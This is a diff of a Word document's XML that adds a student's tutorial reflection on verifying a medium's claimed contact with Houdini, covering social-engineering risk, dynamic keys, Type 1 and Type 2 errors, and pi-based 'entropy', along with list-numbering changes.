-                          <a:blip r:embed="rId23"/>
+                          <a:blip r:embed="rId24"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -3933,6 +3983,8 @@
       </w:tr>
     </w:tbl>
     <w:p/>
+    <w:p/>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -3953,7 +4005,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="rId24">
+      <w:hyperlink r:id="rId25">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -3985,7 +4037,160 @@
           <w:tcPr>
             <w:tcW w:w="9360" w:type="dxa"/>
           </w:tcPr>
-          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:kern w:val="2"/>
+                <w:lang w:eastAsia="en-AU"/>
+                <w14:ligatures w14:val="standardContextual"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>During the tutorial, we considered how Houdini’s protocol could better verify a medium claiming to communicate with him after death.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+              <w:spacing w:after="160" w:line="279" w:lineRule="auto"/>
+              <w:rPr>
+                <w:kern w:val="2"/>
+                <w:lang w:eastAsia="en-AU"/>
+                <w14:ligatures w14:val="standardContextual"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:lastRenderedPageBreak/>
+              <w:t>We first discussed the risk of entrusting the passcode to Bess, since her personal connection made her vulnerable to social engineering. I agreed the secret should move to another mechanism, as any single person becomes a weak target that many mediums could pressure or exploit.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+              <w:spacing w:after="160" w:line="279" w:lineRule="auto"/>
+              <w:rPr>
+                <w:kern w:val="2"/>
+                <w:lang w:eastAsia="en-AU"/>
+                <w14:ligatures w14:val="standardContextual"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>To reduce this risk, we proposed using a dynamic key generated for each test. This would make the code harder to break, especially if time was included to add entropy.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+              <w:spacing w:after="160" w:line="279" w:lineRule="auto"/>
+              <w:rPr>
+                <w:kern w:val="2"/>
+                <w:lang w:eastAsia="en-AU"/>
+                <w14:ligatures w14:val="standardContextual"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>One suggestion was to use the date and time as inputs to a Fibonacci-based algorithm that changes the spoken phrase. While stronger than a fixed passcode, it still depends on Bess knowing the method. If she revealed it, or if enough mediums tested patterns over time, the code could still be approximated, creating Type 2 error risks.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+              <w:spacing w:after="160" w:line="279" w:lineRule="auto"/>
+              <w:rPr>
+                <w:kern w:val="2"/>
+                <w:lang w:eastAsia="en-AU"/>
+                <w14:ligatures w14:val="standardContextual"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>To counter false attempts, I proposed raising the cost of guessing by removing Bess and placing the medium in a puzzle or trap only Houdini could solve. This would discourage brute force attempts, but it risks a Type 1 error by harming a truthful medium and could still be defeated if the trap were tampered with. This showed me that both error types cannot be fully eliminated.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+              <w:spacing w:after="160" w:line="279" w:lineRule="auto"/>
+              <w:rPr>
+                <w:kern w:val="2"/>
+                <w:lang w:eastAsia="en-AU"/>
+                <w14:ligatures w14:val="standardContextual"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="2"/>
+                <w:lang w:eastAsia="en-AU"/>
+                <w14:ligatures w14:val="standardContextual"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Another alternative method proposed was to use the digits of </w:t>
+            </w:r>
+            <m:oMath>
+              <m:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                  <w:kern w:val="2"/>
+                  <w:lang w:eastAsia="en-AU"/>
+                  <w14:ligatures w14:val="standardContextual"/>
+                </w:rPr>
+                <m:t>π</m:t>
+              </m:r>
+            </m:oMath>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="2"/>
+                <w:lang w:eastAsia="en-AU"/>
+                <w14:ligatures w14:val="standardContextual"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> to hash the cipher text in such a way, since currently the digits of </w:t>
+            </w:r>
+            <m:oMath>
+              <m:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                  <w:kern w:val="2"/>
+                  <w:lang w:eastAsia="en-AU"/>
+                  <w14:ligatures w14:val="standardContextual"/>
+                </w:rPr>
+                <m:t>π</m:t>
+              </m:r>
+            </m:oMath>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="2"/>
+                <w:lang w:eastAsia="en-AU"/>
+                <w14:ligatures w14:val="standardContextual"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> are pseudorandom and hence will </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="2"/>
+                <w:lang w:eastAsia="en-AU"/>
+                <w14:ligatures w14:val="standardContextual"/>
+              </w:rPr>
+              <w:t>significantly increase the entropy of the encryption system making it even harder to attempt to crack.</w:t>
+            </w:r>
+          </w:p>
           <w:p/>
           <w:p/>
           <w:p/>
@@ -4034,8 +4239,8 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId25"/>
-      <w:footerReference w:type="default" r:id="rId26"/>
+      <w:headerReference w:type="default" r:id="rId26"/>
+      <w:footerReference w:type="default" r:id="rId27"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
@@ -4489,6 +4694,155 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="2FFB5C29"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="D3E0C1CA"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4923DB14"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="58F04830"/>
@@ -4574,7 +4928,305 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="5D566498"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="E7CE6B42"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="63F87F36"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="3AE257B0"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6C0B3BCB"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="66E27918"/>
@@ -4686,7 +5338,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="757A9A20"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="B212E0C6"/>
@@ -4772,20 +5424,181 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="7A6A7E74"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="032E7D24"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="64576364">
-    <w:abstractNumId w:val="4"/>
+    <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="548495595">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="2077703631">
-    <w:abstractNumId w:val="2"/>
+    <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="1117984316">
-    <w:abstractNumId w:val="3"/>
+    <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="1129320367">
     <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="6" w16cid:durableId="755437397">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="7" w16cid:durableId="1805536101">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="8" w16cid:durableId="1094784343">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="9" w16cid:durableId="791024434">
+    <w:abstractNumId w:val="4"/>
   </w:num>
 </w:numbering>
 </file>
@@ -5265,7 +6078,6 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
